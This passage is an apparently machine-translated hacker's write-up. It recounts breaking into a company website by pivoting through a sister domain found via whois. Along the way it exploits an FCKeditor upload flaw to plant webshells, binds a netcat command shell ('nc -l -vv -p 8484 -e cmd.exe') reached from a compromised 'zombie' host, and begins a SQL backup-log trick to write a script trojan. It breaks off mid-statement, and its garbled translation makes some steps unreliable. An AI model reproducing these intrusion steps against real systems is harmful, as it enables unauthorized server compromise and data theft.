Author: 814ckhum0r
1. Overall Thinking:
If asp resolution is disabled on the target website server and the aspshell cannot be executed, you can use the domain name registration information to obtain the technical administrator's mailbox. Through this mailbox information, you can find that this mailbox has registered another domain name cdxxx.cn at the same time, using the second fckeditor Upload Vulnerability, attackers intrude into this website (cdxxx.cn) to obtain webshells. It is found that the iis configuration information on this server (cdxxx.cn) has a target website. If the elevation of permission fails, use the mssql account with the dbo permission of a site on this server to execute SQL statements to back up a script Trojan to the web directory of the target site on the original server (cdxxx.cn), and view the system. the config File obtains the password of the database connection account of the target website. The password is used to successfully connect to the database of the target server. At the same time, the database role is also dbo. Back up the aspx pony to the target site directory and then escalate the permission. In this case, the website and server are successfully destroyed.
2. Detailed Process
Recently, a company leader asked me to take a look at the website security situation when I was a graduate student, and agreed with me as soon as possible. This test made me depressed several times, so I decided to write it down to make it easy for audience.
After preliminary information collection, it is found that the target server environment is Win2003 + IIS6.0 + ASP.net + mssql2000,
The IP address is 221. xxx.77.1. The website should be outsourced to a company. First, I tried SQL injection. I flipped through the main site and found a few pages with parameters but none of them were used. I used wwwscan, webcruiser, acunetix wvs is not available after scanning. After registering a user at the front-end, the system prompts you to enter the recommender. At the moment, the recommender is not found and you want to test the account on the new site, try to log on to the foreground with the account "test" and password "test ~~, Find another place to upload. A normal image is uploaded at the profile picture upload area. Refresh the image and view the property to get the address. (Figure 1 ):
It can be seen that the user name is test, and the Avatar address is a 404 error, so it hurts once.
After checking the ip address, there are three domain names on the server. One is the master site, the other is a subdomain name, and the other is an irrelevant site. Google found several second-level domain names, scanned a sub-domain name with wwwscan, and found fckeditor under the root directory. In my mind, I tried the second fckeditor Upload Vulnerability and successfully uploaded an image Trojan, this is the second time it hurts. It is estimated that asp Application Extensions are disabled in iis and only aspx is left. Later, fckeditor of all the second-level domain names on the website was tried and fails to be executed. Another irrelevant site is also tested. None of them are available. It took a lot of time to do the above useless work. I want to give up reporting to the leaders and say there is no problem. When I got off work again, I did not report it. I stepped on my bicycle and went home. I thought about it again on the way home, but I still don't think I can do it. So I thought about how to proceed. When I went home for dinner, I opened my junk book and went on ).
Query the target domain name through whois to get the domain name registration Email information, Email:Arcaixxx@163.comThen, the anti-query mailbox will know that this mailbox has registered mapxxx.cn (ip: 124.17x.x.x.40) domain name (Figure 2 ):
I tried to access this domain name and found that the website could not be opened. I searched this mailbox with google to get the registered company name. I continued to search this company name with google to get another domain name cdxxx.cn (IP: 124.17x.x.40) and can be accessed normally (Figure 3 ):
After a preliminary look at this website, the search function has an injection vulnerability, but it is troublesome to use it. I gave up temporarily. I posted a post on the Forum and found fckeditor (figure 4 ):
This time I did not report too much hope. I tried the second Upload Vulnerability to get a Trojan horse (figure 5) and write it into aspxspy to get webshell:
(Conclusion: When you look forward to the results, it is always disappointing. If you don't expect good results, it will surprise you ~~~).. The iisspy function shows the target website information. The company was not deleted after the website was migrated (figure 6 ):
Immediately execute notepad c: windowssystem32driversetchosts to add the target website domain name to this server (IP: 124.17x.x.40), then execute ipconfig/flushdns, and re-open the browser to access the domain name. In addition, the site is manually configured, and it seems that it is not safe. Attempt to redirect the directory failed, and several other web directories failed. This is expected. The C drive can list directories, but one sub-directory cannot be read, and other partitions cannot be read, I tried bloodsword's darkblade brute force guess directory. Fortunately, the temp folder can be written, readable, and executable. After passing the cmd.exe to the cookies directory, I tried 360 Brazilian barbecue \ su and failed to try other Elevation of Privilege programs. I didn't respond either when I tried the column directory by using commands, some passwords in iisspy cannot connect mssql or su. Even a lot of commands provided by the execution system do not work, and the registry is useless. The intrusion is in the dead corner, and it is very late. Looking out the window, the night is so quiet. It turns out that everyone is asleep, and only one of me and my computer are still "working" with the sound of heat. The brain tells itself that it is time to take a rest, put two light music, and then go to bed after washing.
On the way to work the next day, I suddenly remembered that asp application extensions should not be disabled on the target site of the original server. So I can use the fckeditor Upload Vulnerability and try again. After arriving at the company, I can't wait to practice it. As a result, connector. aspx always returns the 500 error and cannot be passed. It hurts again. After a while, think about it. With the web account and password of the target site, try to copy the webshell to the directory of the target site by running commands such as runas. Therefore, I found two third-party command line tools similar to runas on the Internet. (If you are not clear, you can search for "lsrunas" and "runas.exe does not need to enter the password interactively". I downloaded the example, renamed it runas1.exe, and uploaded it, upload An aspx Trojan to c: windowsempcookiesa. aspx: Execute "runas1.exe/user: webuser c: windowsempcookiescmd.exe/c copy c: windowsempcookiesa in webshell. aspx d: wwwrootwww. tianxxxx. comwwwrootimages webpass "(Note: webuseris A webaccount, and webpassers are not responding to the corresponding password, and nc.exe is uploaded. Write a batch of nc-l-vv-p 8484-e c: windowsempcookiecmd.exe in webshell. Connect the Remote Desktop to a zombie and execute nc.exe 124.172.x.x 8484 To Get A mongoshell, this shell also inherits the permissions of the web account. Execute cd c: windowsempcookies in shell to switch to the current directory. Run runas1.exe/user: username command.exe password again. After testing, we found that only the exe program can be executed. If you execute batch processing, even if the absolute path is given, the system will prompt that the path cannot be found, so I used vb to write a small program for copying files.
Private Sub Form_Load ()
FileCopy "c: windowsempcookiesa. aspx", "d: wwwrootwww. xuehi. comwwwrootimagesa. aspx"
End Sub
After the exe file is generated, upload it to c: windowsempcookiescopy1.exe and run runas1.exe/user: webuser copy1.exe webpass. the prompt is that copy1.exe has been executed with webuserid, check the process, and execute tasklist, prompting that tasklist is not internal, it is not a runable program. If you execute other Common commands like this, it is estimated that it is an environment variable problem. You have uploaded several common command tools to c: windowsempcookies, and then executed tasklist.exe in shell, copy1.exe is successfully created. but access. aspx is still 404 page.
After N years of tossing, there was no progress. This is the noon off-duty time. After lunch with my colleagues, I took a nap in the office and woke up to continue working. Find the directory that can be entered in the iisspy of aspxspy one by one. Sure enough, find a website for discuz nt. Directly go to the web directory and view DNT. config to get an mssql account (Figure 7 ):
Connect with the database function of aspxspy. The public permission is displayed (figure 8 ):
Although it is public, I still report a glimmer of hope to execute the backup statement to write an asp sentence to the directory site directory. The current user only has operation permissions on the xxxxbbs database, so the complete statement is as follows: alter database xxxxbbs set recovery full; create table cmd (a image); backup log xxxxbbs to disk = c: windowsempcookiesm2 with init; insert into c